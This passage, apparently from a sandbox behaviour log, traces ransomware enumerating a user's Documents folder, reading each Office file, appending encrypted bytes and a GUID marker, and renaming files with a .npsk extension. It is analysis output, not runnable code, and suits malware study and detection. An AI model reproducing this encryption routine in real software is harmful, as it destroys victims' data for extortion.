halpmcxz\\documents\\subwsouxzs1.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sUBwSOUxzs1.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\subwsouxzs1.pptx.npsk")) returned 1 [0215.629] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c862360, ftCreationTime.dwHighDateTime=0x1d56511, ftLastAccessTime.dwLowDateTime=0x8f399e10, ftLastAccessTime.dwHighDateTime=0x1d585f4, ftLastWriteTime.dwLowDateTime=0x8f399e10, ftLastWriteTime.dwHighDateTime=0x1d585f4, nFileSizeHigh=0x0, nFileSizeLow=0xf82b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V3 XRFAnoiQYiAuBOs.xlsx", cAlternateFileName="V3XRFA~1.XLS")) returned 1 [0215.629] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V3 XRFAnoiQYiAuBOs.xlsx") returned=".xlsx" [0215.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V3 XRFAnoiQYiAuBOs.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v3 xrfanoiqyiaubos.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.630] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=63531) returned 1 [0215.630] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.631] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf805, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.631] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.633] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf82b, lpOverlapped=0x0) returned 1 [0215.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.634] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.635] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.635] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.635] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.635] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.635] GetLastError () returned 0x0 [0215.635] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.635] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.635] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.635] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.635] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.636] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.637] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf82b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.637] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.637] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.637] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.637] CloseHandle (hObject=0x61c) returned 1 [0215.641] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V3 XRFAnoiQYiAuBOs.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v3 xrfanoiqyiaubos.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V3 XRFAnoiQYiAuBOs.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v3 xrfanoiqyiaubos.xlsx.npsk")) returned 1 [0215.642] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y5VbixHYeFSBUXkYrU1j", cAlternateFileName="Y5VBIX~1")) returned 1 [0215.643] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65474220, ftCreationTime.dwHighDateTime=0x1d5d2b5, ftLastAccessTime.dwLowDateTime=0xce2999d0, ftLastAccessTime.dwHighDateTime=0x1d572a9, ftLastWriteTime.dwLowDateTime=0xce2999d0, ftLastWriteTime.dwHighDateTime=0x1d572a9, nFileSizeHigh=0x0, nFileSizeLow=0xd438, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZWcVGEhZXSAZ8VfaWOP.xlsx", cAlternateFileName="ZWCVGE~1.XLS")) returned 1 [0215.643] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZWcVGEhZXSAZ8VfaWOP.xlsx") returned=".xlsx" [0215.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZWcVGEhZXSAZ8VfaWOP.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwcvgehzxsaz8vfawop.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.643] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=54328) returned 1 [0215.643] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.645] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd412, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.645] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.646] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd438, lpOverlapped=0x0) returned 1 [0215.647] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.647] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.647] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.647] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.648] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.648] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.648] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.648] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.648] GetLastError () returned 0x0 [0215.648] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.648] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.648] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.648] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.648] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.649] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.649] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd438, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.649] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.649] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.649] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.650] CloseHandle (hObject=0x61c) returned 1 [0215.651] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZWcVGEhZXSAZ8VfaWOP.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwcvgehzxsaz8vfawop.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZWcVGEhZXSAZ8VfaWOP.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwcvgehzxsaz8vfawop.xlsx.npsk")) returned 1 [0215.653] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad95e9b0, ftCreationTime.dwHighDateTime=0x1d56d97, ftLastAccessTime.dwLowDateTime=0x3fe168f0, ftLastAccessTime.dwHighDateTime=0x1d58925, ftLastWriteTime.dwLowDateTime=0x3fe168f0, ftLastWriteTime.dwHighDateTime=0x1d58925, nFileSizeHigh=0x0, nFileSizeLow=0x11fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_C L.pptx", cAlternateFileName="_CL~1.PPT")) returned 1 [0215.653] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_C L.pptx") returned=".pptx" [0215.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_C L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_c l.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.653] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=73692) returned 1 [0215.654] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.656] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11fb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.656] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.658] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x11fdc, lpOverlapped=0x0) returned 1 [0215.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.659] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.660] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.660] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.660] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.660] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.660] GetLastError () returned 0x0 [0215.660] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.660] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.660] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.660] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.660] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.661] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.661] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11fdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.661] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.662] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.662] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.662] CloseHandle (hObject=0x61c) returned 1 [0215.668] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_C L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_c l.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_C L.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_c l.pptx.npsk")) returned 1 [0215.670] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad95e9b0, ftCreationTime.dwHighDateTime=0x1d56d97, ftLastAccessTime.dwLowDateTime=0x3fe168f0, ftLastAccessTime.dwHighDateTime=0x1d58925, ftLastWriteTime.dwLowDateTime=0x3fe168f0, ftLastWriteTime.dwHighDateTime=0x1d58925, nFileSizeHigh=0x0, nFileSizeLow=0x11fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_C L.pptx", cAlternateFileName="_CL~1.PPT")) returned 0 [0215.670] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.670] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0215.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.671] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.671] PathFindFileNameW (pszPath="") returned="" [0215.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.671] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.671] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.671] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0215.671] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, 